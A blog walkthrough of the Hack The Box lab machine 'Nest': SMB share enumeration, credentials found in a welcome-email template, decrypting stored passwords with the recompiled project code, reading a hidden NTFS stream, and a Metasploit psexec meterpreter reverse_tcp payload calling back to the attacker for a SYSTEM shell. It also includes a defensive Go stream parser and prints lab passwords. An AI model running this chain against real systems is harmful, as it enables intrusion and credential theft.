HTB Nest Walkthrough


Jul 30, 2020 | nanobyte

This is one of my favorite Hack the Box machines, throughout my time completing them! I absolutely enjoyed every minute of this box.

My first NMAP scan, running with multiple flags, failed. I performed a simple nmap scan, and it returned only one port open:

```
nmap 10.10.10.178
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 09:25 CST
Nmap scan report for 10.10.10.178
Host is up (0.043s latency).
Not shown: 999 filtered ports
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 5.41 seconds
```

With port 445 open, I then ran a scan against SMB. Server Message Block (SMB; Samba is the open-source implementation of it) is the way Windows shares files, printers, serial ports and communication abstractions such as named pipes and mail slots between computers.

```
smbclient -L //10.10.10.178
Enter WORKGROUP\root's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Data            Disk
        IPC$            IPC       Remote IPC
        Secure$         Disk
        Users           Disk
SMB1 disabled -- no workgroup available
```

The smbclient command showed that there were several network shares. Smbclient is a client tool for SMB/Samba that gives the user an FTP-like experience. I went through and connected to each share, and found that I was able to log in to the Users share and see possible usernames. I took note of these, as this information was sure to come up later on this box:

```
smbclient \\\\10.10.10.178\\Users
Enter WORKGROUP\root's password:
smb: \> dir
  .                                   D        0  Sat Jan 25 17:04:21 2020
  ..                                  D        0  Sat Jan 25 17:04:21 2020
  Administrator                       D        0  Fri Aug  9 10:08:23 2019
  C.Smith                             D        0  Sun Jan 26 01:21:44 2020
  L.Frost                             D        0  Thu Aug  8 12:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 12:02:50 2019
  TempUser                            D        0  Wed Aug  7 17:55:56 2019

                10485247 blocks of size 4096. 6449754 blocks available
```

I did attempt to access each of the user directories listed, but access was denied for all of them. Continuing my enumeration of the network shares, I connected to Data, and found I could get into the Shared directory:

```
smbclient \\\\10.10.10.178\\Data
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Aug  7 17:53:46 2019
  ..                                  D        0  Wed Aug  7 17:53:46 2019
  IT                                  D        0  Wed Aug  7 17:58:07 2019
  Production                          D        0  Mon Aug  5 16:53:38 2019
  Reports                             D        0  Mon Aug  5 16:53:44 2019
  Shared                              D        0  Wed Aug  7 14:07:51 2019

                10485247 blocks of size 4096. 6449754 blocks available
smb: \Reports\> cd ..\Shared
smb: \Shared\> dir
  .                                   D        0  Wed Aug  7 14:07:51 2019
  ..                                  D        0  Wed Aug  7 14:07:51 2019
  Maintenance                         D        0  Wed Aug  7 14:07:32 2019
  Templates                           D        0  Wed Aug  7 14:08:07 2019

                10485247 blocks of size 4096. 6449754 blocks available
```

In the Maintenance directory, I found a file, Maintenance Alerts.txt. I used the get command to download the file to my local box, and viewed it on my Kali Linux machine:

```
smb: \Shared\Maintenance\> dir
  .                                   D        0  Wed Aug  7 14:07:32 2019
  ..                                  D        0  Wed Aug  7 14:07:32 2019
  Maintenance Alerts.txt              A       48  Mon Aug  5 18:01:44 2019

                10485247 blocks of size 4096. 6449754 blocks available
smb: \Shared\Maintenance\> get "Maintenance Alerts.txt"
getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
root@bhax0r:~# cat 'Maintenance Alerts.txt'
There is currently no scheduled maintenance work
```

However, still nothing! I then went up one directory, changed into the Templates directory, and found another file, Welcome Email.txt. This sounded promising:

```
smb: \Shared\Templates\HR\> dir
  .                                   D        0  Wed Aug  7 14:08:01 2019
  ..                                  D        0  Wed Aug  7 14:08:01 2019
  Welcome Email.txt                   A      425  Wed Aug  7 17:55:36 2019

                10485247 blocks of size 4096. 6449754 blocks available
smb: \Shared\Templates\HR\> get "Welcome Email.txt"
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (2.4 KiloBytes/sec) (average 0.9 KiloBytes/sec)
root@hax0r:~# cat 'Welcome Email.txt'
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location:
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019

Thank you
```

And I found a possible set of credentials, TempUser:welcome2019! Remembering the Users share from earlier, I logged back in to that network share with these credentials:

```
smbclient \\\\10.10.10.178\\Users -U TempUser
Enter WORKGROUP\TempUser's password:
Try "help" to get a list of possible commands.
smb: \> cd TempUser
smb: \TempUser\> dir
  .                                   D        0  Wed Aug  7 17:55:56 2019
  ..                                  D        0  Wed Aug  7 17:55:56 2019
  New Text Document.txt               A        0  Wed Aug  7 17:55:56 2019

                10485247 blocks of size 4096. 6449754 blocks available
smb: \TempUser\> get "New Text Document.txt"
getting file \TempUser\New Text Document.txt of size 0 as New Text Document.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
root@hax0r:~# cat 'New Text Document.txt'
```

However, this did not give me any further information. I then attempted to log in to the Users share with the other usernames, using the same password (users don't always change default passwords), but this approach also did not work. So I moved on and used these credentials against the other shares. I did find that they let me into Secure$:

```
smbclient \\\\10.10.10.178\\Secure$ -U TempUser
Enter WORKGROUP\TempUser's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Aug  7 18:08:12 2019
  ..                                  D        0  Wed Aug  7 18:08:12 2019
  Finance                             D        0  Wed Aug  7 14:40:13 2019
  HR                                  D        0  Wed Aug  7 18:08:11 2019
  IT                                  D        0  Thu Aug  8 05:59:25 2019

                10485247 blocks of size 4096. 6449738 blocks available
```

But there was nothing within that network share that I could use to my advantage at this point. Moving on, I was also able to log in to the Data share with the TempUser credentials, and there I found two interesting files, RU_config.xml and config.xml:

```
smb: \IT\Configs\RU Scanner\> ls
  .                                   D        0  Wed Aug  7 15:01:13 2019
  ..                                  D        0  Wed Aug  7 15:01:13 2019
  RU_config.xml                       A      270  Thu Aug  8 14:49:37 2019

                10485247 blocks of size 4096. 6449935 blocks available
smb: \IT\Configs\RU Scanner\> get RU_config.xml
getting file \IT\Configs\RU Scanner\RU_config.xml of size 270 as RU_config.xml (1.5 KiloBytes/sec) (average 17.6 KiloBytes/sec)
root@hax0r:~# cat RU_config.xml
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>
```

```
smb: \IT\Configs\NotepadPlusPlus\> ls
  .                                   D        0  Wed Aug  7 14:31:37 2019
  ..                                  D        0  Wed Aug  7 14:31:37 2019
  config.xml                          A     6451  Wed Aug  7 18:01:25 2019
  shortcuts.xml                       A     2108  Wed Aug  7 14:30:27 2019

                10485247 blocks of size 4096. 6449935 blocks available
smb: \IT\Configs\NotepadPlusPlus\> get config.xml
getting file \IT\Configs\NotepadPlusPlus\config.xml of size 6451 as config.xml (37.5 KiloBytes/sec) (average 23.4 KiloBytes/sec)
root@hax0r:~# cat config.xml
...
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
    </History>
...
```

Neither of these looked like much at first, but both hold relevant and important information. First, we have a username and an encrypted password from RU_config.xml. The second is easily missed: the second File filename entry in config.xml points at \\HTB-NEST\Secure$\IT\Carl\Temp.txt, so there is a Carl directory within the IT directory of the Secure$ share. RU_config.xml gives a password for c.smith; could that be Carl?!

I logged in and attempted to see if I could get to the Carl directory:

```
smbclient \\\\10.10.10.178\\Secure$ -U TempUser
Enter WORKGROUP\TempUser's password: welcome2019
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Aug  7 18:08:12 2019
  ..                                  D        0  Wed Aug  7 18:08:12 2019
  Finance                             D        0  Wed Aug  7 14:40:13 2019
  HR                                  D        0  Wed Aug  7 18:08:11 2019
  IT                                  D        0  Thu Aug  8 05:59:25 2019

                10485247 blocks of size 4096. 6449738 blocks available
smb: \> cd IT
smb: \IT\> dir
NT_STATUS_ACCESS_DENIED listing \IT\*
smb: \IT\> cd Carl
smb: \IT\Carl\> dir
  .                                   D        0  Wed Aug  7 14:42:14 2019
  ..                                  D        0  Wed Aug  7 14:42:14 2019
  Docs                                D        0  Wed Aug  7 14:44:00 2019
  Reports                             D        0  Tue Aug  6 08:45:40 2019
  VB Projects                         D        0  Tue Aug  6 09:41:55 2019
```

And that worked! Note above that while in the Secure$\IT directory I could not list its contents, yet I could still change into the Carl directory underneath it: the listing was denied, not traversal. Awesome! Enumerating these files, I found an RUScanner project in the VB Projects directory:

```
smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> dir
  .                                   D        0  Wed Aug  7 17:05:54 2019
  ..                                  D        0  Wed Aug  7 17:05:54 2019
  bin                                 D        0  Wed Aug  7 15:00:11 2019
  ConfigFile.vb                       A      772  Wed Aug  7 17:05:09 2019
  Module1.vb                          A      279  Wed Aug  7 17:05:44 2019
  My Project                          D        0  Wed Aug  7 15:00:11 2019
  obj                                 D        0  Wed Aug  7 15:00:11 2019
  RU Scanner.vbproj                   A     4828  Fri Aug  9 10:37:51 2019
  RU Scanner.vbproj.user              A      143  Tue Aug  6 07:55:27 2019
  SsoIntegration.vb                   A      133  Wed Aug  7 17:05:58 2019
  Utils.vb                            A     4888  Wed Aug  7 14:49:35 2019

                10485247 blocks of size 4096. 6449951 blocks available
```

Looking at the Utils.vb file, there are encrypting and decrypting functions. Looking at how they work, they create a symmetric key using Rfc2898DeriveBytes. Instead of trying to break this encryption by hand, I copied the complete project structure to a Windows machine, where I was able to compile the code using Visual Studio.

Once it was compiled and I attempted to run it, there was an error message:

```
Unhandled Exception: System.IO.FileNotFoundException: Could not find file 'C:\Users\adalzell\Desktop\Nest\RUScanner\bin\Debug\RU_Config.xml'
```

Since I already had the RU_config.xml file, which contains the base64-looking encrypted password string, I placed it into that directory, and when I ran the program again it completed without any exceptions. I then added a single line to the Decrypt function in Utils.vb to write the plain text to the console:

```vb
Public Shared Function Decrypt(ByVal cipherText As String, _
...
        Console.WriteLine(plainText)
        Return plainText
...
```

And with that, when I compiled the code again, I could see the plain text password:

```
\RUScanner\bin\Debug>DbPof.exe
xRxRxPANCAK3SxRxRx
```

Now, I am able to connect to the Users share and own user:

```
smbclient \\\\10.10.10.178\\Users -U C.Smith
Enter WORKGROUP\C.Smith's password: xRxRxPANCAK3SxRxRx
smb: \> cd C.Smith
smb: \C.Smith\> ls
  .                                   D        0  Sun Jan 26 01:21:44 2020
  ..                                  D        0  Sun Jan 26 01:21:44 2020
  HQK Reporting                       D        0  Thu Aug  8 18:06:17 2019
  user.txt                            A       32  Thu Aug  8 18:05:24 2019

                10485247 blocks of size 4096. 6449757 blocks available
smb: \C.Smith\> get user.txt
getting file \C.Smith\user.txt of size 32 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
root@hax0r:~# cat user.txt
xxxxxxxxxxxxxxx4fd827e05f426e987
```

Now to move on to own root. I looked in the HQK Reporting directory, and found a password file:

```
smb: \C.Smith\HQK Reporting\> ls
  .                                   D        0  Thu Aug  8 18:06:17 2019
  ..                                  D        0  Thu Aug  8 18:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 07:18:42 2019
  Debug Mode Password.txt             A        0  Thu Aug  8 18:08:17 2019
  HQK_Config_Backup.xml               A      249  Thu Aug  8 18:09:05 2019

                10485247 blocks of size 4096. 6449725 blocks available
```

But it was empty (0 bytes). That would have been too easy! However, looking at the file's allinfo output, there is a second named stream attached to it, so I retrieved that Alternate Data Stream (ADS) to get the password:

```
smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    Thu Aug  8 06:06:12 PM 2019 CDT
access_time:    Thu Aug  8 06:06:12 PM 2019 CDT
write_time:     Thu Aug  8 06:08:17 PM 2019 CDT
change_time:    Thu Aug  8 06:08:17 PM 2019 CDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
smb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt:Password"
root@hax0r:~# cat "/root/Debug Mode Password.txt:Password"
WBQ201953D8w
```
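A zero-byte file that still carries data is exactly the kind of thing a share audit should flag, and the allinfo output above is the only place smbclient exposes it. As an added example (not code from the original post or from the box), here is a small Go parser that reads allinfo output and reports any named stream besides the default ::$DATA. The sample input is constructed from the listing above; the function names ParseAllInfoStreams and HiddenStreams are my own. It goes slightly beyond the page by treating Zone.Identifier (the mark-of-the-web stream Windows adds to downloaded files) as expected noise unless you ask to see it.

```go
package main

import (
	"fmt"
	"regexp"
	"strconv"
	"strings"
)

// Stream is one NTFS data stream as smbclient's allinfo reports it.
// Name is "" for the unnamed default stream (::$DATA); otherwise it is the
// stream name, e.g. "Password" for "Debug Mode Password.txt:Password".
type Stream struct {
	Name string
	Size int64
}

// allinfo prints each stream as:  stream: [:<name>:$DATA], <n> bytes
var streamRe = regexp.MustCompile(`^stream: \[:([^:]*):\$DATA\], (\d+) bytes$`)

// ParseAllInfoStreams pulls the stream lines out of one file's allinfo output.
func ParseAllInfoStreams(output string) ([]Stream, error) {
	var streams []Stream
	for _, line := range strings.Split(output, "\n") {
		line = strings.TrimSpace(line)
		if !strings.HasPrefix(line, "stream:") {
			continue
		}
		m := streamRe.FindStringSubmatch(line)
		if m == nil {
			return nil, fmt.Errorf("unrecognised stream line: %q", line)
		}
		size, err := strconv.ParseInt(m[2], 10, 64)
		if err != nil {
			return nil, err
		}
		streams = append(streams, Stream{Name: m[1], Size: size})
	}
	return streams, nil
}

// HiddenStreams returns the named streams that a plain dir listing never shows.
// Zone.Identifier is so common on downloaded files that it is skipped unless
// keepZone is set.
func HiddenStreams(streams []Stream, keepZone bool) []Stream {
	var out []Stream
	for _, s := range streams {
		if s.Name == "" || (!keepZone && s.Name == "Zone.Identifier") {
			continue
		}
		out = append(out, s)
	}
	return out
}

// sampleAllInfo is constructed from the allinfo output shown above.
const sampleAllInfo = `smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    Thu Aug  8 06:06:12 PM 2019 CDT
access_time:    Thu Aug  8 06:06:12 PM 2019 CDT
write_time:     Thu Aug  8 06:08:17 PM 2019 CDT
change_time:    Thu Aug  8 06:08:17 PM 2019 CDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
`

func main() {
	streams, err := ParseAllInfoStreams(sampleAllInfo)
	if err != nil {
		panic(err)
	}
	for _, s := range HiddenStreams(streams, false) {
		// The file itself is 0 bytes; the payload lives in the named stream.
		fmt.Printf("named stream %q (%d bytes): retrieve with get \"<file>:%s\"\n", s.Name, s.Size, s.Name)
	}
}
```

Run with `go run`. In a review of a share, you would loop allinfo over every file and feed each block of output to ParseAllInfoStreams; anything HiddenStreams returns deserves a look, because a name like Password sitting in a stream on a zero-byte file is not something a normal application produces.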

With this password, I can telnet into the box and enable Debug:

```
telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>debug WBQ201953D8w
Debug mode enabled. Use the HELP command to view additional commands that are now available
```

Still connected in this telnet session, I enumerated the directories the service exposes; going up one level and into the LDAP directory, I found a config file:

```
>list

Use the query ID numbers below with the RUNQUERY command
and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: LDAP
>showquery 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
```

Attempting to decrypt this password the same way as the RU_config.xml one returned a padding error. Looking further into HqkLdap.exe, I found the following code in its CR class:

```vb
' HqkLdap.CR
' Token: 0x06000012 RID: 18 RVA: 0x00002278 File Offset: 0x00000678
Public Shared Function DS(EncryptedString As String) As String
    If String.IsNullOrEmpty(EncryptedString) Then
        Return String.Empty
    End If
    Return CR.RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256)
End Function
```

This is a different set of encryption parameters: different strings, a different IV and a different iteration count. So I put these values into the Decrypt function of DbPof.exe, placed the Administrator password string from Ldap.conf into the RU_config.xml file, reran DbPof.exe from a command prompt, and got the Administrator password!

```
DbPof.exe
XtH4nkS4Pl4y1nGX
```

I connected to the SMB share as Administrator, but all it held was a shortcut link to the admin's desktop, which was no good. So, after multiple failed attempts with evil-winrm, impacket's psexec.py, and winexec, I used Metasploit's psexec module with a reverse_tcp payload:

```
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/psexec) > set LHOST 10.10.14.13
LHOST => 10.10.14.13
msf5 exploit(windows/smb/psexec) > set LPORT 4538
LPORT => 4538
msf5 exploit(windows/smb/psexec) > set RHOSTS 10.10.10.178
RHOSTS => 10.10.10.178
msf5 exploit(windows/smb/psexec) > set SMBUser
SMBUser =>
msf5 exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf5 exploit(windows/smb/psexec) > set SMBPass XtH4nkS4Pl4y1nGX
SMBPass => XtH4nkS4Pl4y1nGX
msf5 exploit(windows/smb/psexec) > exploit

[*] Started reverse TCP handler on 10.10.14.13:4538
[*] 10.10.10.178:445 - Connecting to the server...
[*] 10.10.10.178:445 - Authenticating to 10.10.10.178:445 as user 'Administrator'...
[*] 10.10.10.178:445 - Selecting PowerShell target
[*] 10.10.10.178:445 - Executing the payload...
[+] 10.10.10.178:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (180291 bytes) to 10.10.10.178
[*] Meterpreter session 1 opened (10.10.14.13:4538 -> 10.10.10.178:49157) at 2020-01-29 14:28:29 -0600

meterpreter > shell
Process 1456 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd C:\users\administrator\desktop
cd C:\users\administrator\desktop

C:\Users\Administrator\Desktop>more root.txt
more root.txt
xxxxxxxxxxxxxxxxxxx08a42f0b94b878c41
```

And rooted this box! The name, Nest, really fits this complex set of steps, nesting each step to proceed. Thanks for reading!
